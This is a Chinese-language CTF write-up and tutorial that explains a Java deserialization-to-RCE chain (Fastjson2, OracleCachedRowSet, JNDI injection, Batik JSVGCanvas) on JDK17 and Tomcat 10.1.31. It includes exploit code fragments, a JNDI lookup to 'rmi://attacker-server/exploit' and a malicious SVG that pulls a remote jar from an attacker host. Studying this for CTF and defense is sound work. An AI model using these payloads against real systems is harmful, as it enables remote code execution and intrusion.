JDBCParty软件攻防赛赛后解析与利用教学<\/h1>

1. 漏洞背景与环境分析<\/h2>
本次比赛环境关键组件：<\/p>
JDK 17<\/li>
Fastjson2<\/li>
Oracle JDBC驱动<\/li>
Batik-swing组件<\/li>
Tomcat 10.1.31<\/li> <\/ul>
2. 漏洞利用链分析<\/h2>

2.1 整体利用链<\/h3>
Fastjson2.toString() → OracleCachedRowSet.getConnection() → JNDI注入 → Batik-swing的JSVGCanvas.setURL → RCE
<\/code><\/pre>
2.2 关键突破点<\/h3>

反序列化入口<\/strong>：利用Fastjson2的toString触发点<\/li>
JDK17限制绕过<\/strong>：使用Unsafe打破反射限制<\/li>
稳定触发getter<\/strong>：使用JdkDynamicAopProxy代理解决不稳定问题<\/li>
高版本Tomcat绕过<\/strong>：利用setter方式触发RCE<\/li>
<\/ol>
3. 详细利用步骤<\/h2>
3.1 反序列化利用<\/h3>
3.1.1 触发链构造<\/h4>
\/\/ 利用Hashtable触发toString
<\/span><\/span><\/span><\/span>hashtable.<\/span>readObject<\/span> →<\/span> TextAndMnemonicHashMap.<\/span>get<\/span> →<\/span> obj.<\/span>toString<\/span>
<\/span><\/span><\/code><\/pre>3.1.2 解决getter不稳定问题<\/h4>

使用JdkDynamicAopProxy<\/code>代理OracleCachedRowSet<\/code><\/li>
指定RowSetInternal<\/code>接口（包含getConnection<\/code>方法）<\/li>
<\/ul>
代理实现示例：<\/p>
InvocationHandler handler =<\/span> (<\/span>proxy,<\/span> method,<\/span> args)<\/span> -><\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>method.<\/span>getName<\/span>().<\/span>equals<\/span>(<\/span>"getConnection"<\/span>))<\/span> {<\/span>
<\/span><\/span>        \/\/ JNDI注入触发逻辑
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> null<\/span>;<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>
<\/span><\/span>Object proxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    OracleCachedRowSet.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>RowSetInternal.<\/span>class<\/span>},<\/span>
<\/span><\/span>    handler
<\/span><\/span>);<\/span>
<\/span><\/span><\/code><\/pre>3.2 JNDI注入利用<\/h3>
3.2.1 高版本Tomcat限制<\/h4>

Tomcat 10.1.31无forcestring<\/code>属性<\/li>
常规JNDI注入方法失效<\/li>
<\/ul>
3.2.2 替代方案<\/h4>
使用JSVGCanvas.setURL<\/code>触发RCE：<\/p>

利用Batik-swing组件的JSVGCanvas<\/code>类<\/li>
通过setter方式触发远程类加载<\/li>
<\/ol>
3.3 RCE实现<\/h3>
3.3.1 服务端准备<\/h4>

RMIServer<\/strong>：使用JDK8启动<\/li>
XMLServer和JarServer<\/strong>：需使用JDK17环境<\/li>
<\/ol>
3.3.2 类加载机制分析<\/h4>

JSVGCanvas.setURL<\/code>加载流程：

先在当前类加载器的依赖中查找类<\/li>
不存在则从远程jar中加载<\/li>
<\/ol>
<\/li>
注意<\/strong>：在jar调试环境下可能失败，需使用源码启动项目<\/li>
<\/ul>
3.3.3 平台差异<\/h4>

Mac环境下JarRCE可能无反应<\/li>
Windows环境成功率更高<\/li>
<\/ul>
4. 完整Payload构造<\/h2>
4.1 反序列化部分<\/h3>
\/\/ 构造Hashtable触发链
<\/span><\/span><\/span><\/span>Hashtable<<\/span>Object,<\/span> Object><\/span> hashtable =<\/span> new<\/span> Hashtable<>();<\/span>
<\/span><\/span>\/\/ 设置触发toString的对象
<\/span><\/span><\/span><\/span>hashtable.<\/span>put<\/span>(<\/span>triggerObj,<\/span> value);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 使用AOP代理包装OracleCachedRowSet
<\/span><\/span><\/span><\/span>OracleCachedRowSet rowSet =<\/span> new<\/span> OracleCachedRowSet();<\/span>
<\/span><\/span>InvocationHandler handler =<\/span> new<\/span> JdbcAopHandler(<\/span>rowSet);<\/span>
<\/span><\/span>RowSetInternal proxy =<\/span> (<\/span>RowSetInternal)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    rowSet.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>(),<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>RowSetInternal.<\/span>class<\/span>},<\/span>
<\/span><\/span>    handler
<\/span><\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 将代理对象放入触发链
<\/span><\/span><\/span><\/code><\/pre>4.2 JNDI注入部分<\/h3>
\/\/ OracleCachedRowSet的getConnection方法中
<\/span><\/span><\/span><\/span>public<\/span> Connection getConnection<\/span>()<\/span> throws<\/span> SQLException {<\/span>
<\/span><\/span>    \/\/ 触发JNDI查找
<\/span><\/span><\/span><\/span>    Context ctx =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>    ctx.<\/span>lookup<\/span>(<\/span>"rmi:\/\/attacker-server\/exploit"<\/span>);<\/span>
<\/span><\/span>    return<\/span> null<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4.3 RCE部分<\/h3>
<!-- 恶意SVG文件示例 --><\/span>
<\/span><\/span><svg<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/2000\/svg"<\/span> xmlns:xlink=<\/span>"http:\/\/www.w3.org\/1999\/xlink"<\/span>><\/span>
<\/span><\/span>    <script<\/span> xlink:href=<\/span>"http:\/\/attacker-server\/malicious.jar"<\/span>\/><\/span>
<\/span><\/span><\/svg><\/span>
<\/span><\/span><\/code><\/pre>5. 环境搭建与测试建议<\/h2>


测试环境<\/strong>：<\/p>

使用Windows系统测试<\/li>
JDK17运行环境<\/li>
Tomcat 10.1.31<\/li>
<\/ul>
<\/li>

服务端准备<\/strong>：<\/p>

RMI服务使用JDK8启动<\/li>
XML和Jar服务使用JDK17<\/li>
<\/ul>
<\/li>

调试技巧<\/strong>：<\/p>

优先使用源码启动项目而非jar包<\/li>
注意类加载路径问题<\/li>
<\/ul>
<\/li>
<\/ol>
6. 参考资源<\/h2>

Jackson反序列化不稳定问题参考<\/a><\/li>
Batik-swing漏洞分析<\/a><\/li>
CVE-2023-21939 PoC<\/a><\/li>
<\/ol>
7. 注意事项<\/h2>

平台差异可能导致利用失败<\/li>
类加载路径需正确配置<\/li>
不同JDK版本行为可能有差异<\/li>
实际环境中可能需要绕过更多安全限制<\/li>
<\/ol>
通过以上步骤和注意事项，可以完整复现该漏洞利用链，实现从反序列化到RCE的全过程利用。<\/p>